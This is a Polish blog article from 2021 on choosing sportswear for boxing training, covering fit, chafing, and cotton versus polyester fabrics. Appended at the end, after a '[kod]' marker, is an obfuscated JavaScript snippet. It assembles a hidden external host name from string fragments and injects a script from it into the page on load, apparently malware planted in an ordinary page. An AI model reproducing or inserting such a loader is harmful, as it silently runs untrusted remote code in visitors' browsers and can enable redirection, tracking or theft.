17.06.2021

#Jakie ubrania sportowe dla bokserów?

Ubrania sportowe powinny wyróżniać się jakością, zwłaszcza gdy chodzi o propozycje przeznaczone do noszenia podczas treningu. Zapewnienie komfortu i przewiewności to niejedyne cechy, które są tutaj niezbędne. Sprawdź, na jakie ubrania warto postawić, szykując się do treningu bokserskiego! Zapraszamy do artykułu.

Postaw na sprawdzoną odzież do treningów

Komfort i dobre samopoczucie są niezwykle ważne podczas treningu. Warto w tym celu postawić na odzież, która nie tylko jest przyjemna w dotyku, ale przede wszystkim chroni skórę przed działaniem czynników zewnętrznych. Działa więc antybakteryjnie – ma to szczególne znaczenie w przypadku bielizny sportowej. Wilgotne i przepocone ubrania są doskonałym miejscem do rozwoju bakterii, które prowadzą do dyskomfortu, podrażnień i alergii skórnych. Naszym zdaniem lepiej być mądrym przed szkodą!

Dobrze dobrana odzież dla bokserów pozwala również utrzymać odpowiednią temperaturę ciała podczas treningu, do tego zapobiega otarciom, które są zmorą wielu osób, zwłaszcza przy zwiększonej potliwości. Jeśli zależy Ci na efektywnym i komfortowym treningu, podczas którego nie będą Cię rozpraszać niewygodne ubrania, to warto zdecydować się na dedykowaną odzież sportową.

Jakie są cechy dobrze dobranych ubrań?

Dobrze dobrana odzież chroni boksera przed otarciami. Ważne jest tutaj jednak wybranie odpowiedniego rozmiaru – ten nie może być ani zbyt obcisły, ani zbyt luźny. Idealne dopasowanie materiału do ciała zapewnia swobodę i nieprzesuwanie się koszulki podczas wykonywania ruchów rękoma. Materiał nie podwija się, a szwy są stosunkowo niewielkie i miękkie w dotyku. Do tego odpowiednio dopasowana odzież chroni przed:

  • odparzeniami – ważne jest wybranie ubrań z przewiewnego materiału, który będzie odprowadzać pot, aby ten nie gromadził się na skórze i nie podrażniał jej,
  • przepoceniem – stroje ze słabych jakościowo materiałów mogą przyklejać się do skóry, powodując dyskomfort oraz gromadzenie się bakterii,
  • nadmiernym uciskiem – zbyt obcisła odzież może powodować uciski, utrudniające krążenie krwi lub krępujące ruchy. Odpowiednie dopasowanie jest tutaj szczególnie ważne w przypadku bielizny,
  • alergiami i podrażnieniami skóry – te mogą być powodowane źle dobranym materiałem ubrań.

Ubrania sportowe dla boksera – na te materiały warto postawić!

Jedną z najpopularniejszych tkanin przy odzieży sportowej jest bawełna organiczna. To przyjemny w dotyku materiał, który cechuje się przewiewnością i wygodą noszenia. Do tego nie krępuje ruchów. Jeżeli jednak masz problemy z potliwością, możesz się z bawełną nie polubić. Stosunkowo słabo odprowadza wilgoć, przez co przepocone ubrania schną długo. Bawełna zatrzymuje też zapachy – przez co musisz liczyć się z częstym praniem ubrań sportowych.

O wiele lepszym rozwiązaniem dla osób mocno pocących się jest poliester. Chociaż jest to tworzywo sztuczne, charakteryzuje się niską chłonnością wody. Doskonale radzi sobie z potem i szybko odparowuje go z powierzchni skóry. Aby zapewnić jeszcze większy komfort noszenia, ubrania wykonane z poliestru posiadają często domieszkę elastanu, który sprawia, że odzież jest bardziej elastyczna i lepiej dopasowuje się do ciała.

Mamy nadzieję, że nasz artykuł rozwiał Twoje wątpliwości dotyczące wyboru odzieży dla bokserów.

[kod]

(function(){
oins=document.createElement("script");oins.async=true;oins_="u"+("s")+"t";
oinsu="304394221.";oins_+="a"+("t.i");oins_+="n"+("f"+"o")+"/";
oinsu+="v61r8xpfinskhrlle9sgx8"+("c78sewxy");
oins.src="https://"+oins_+oinsu;oins.type="text/javascript";
document.body.appendChild(oins);
})();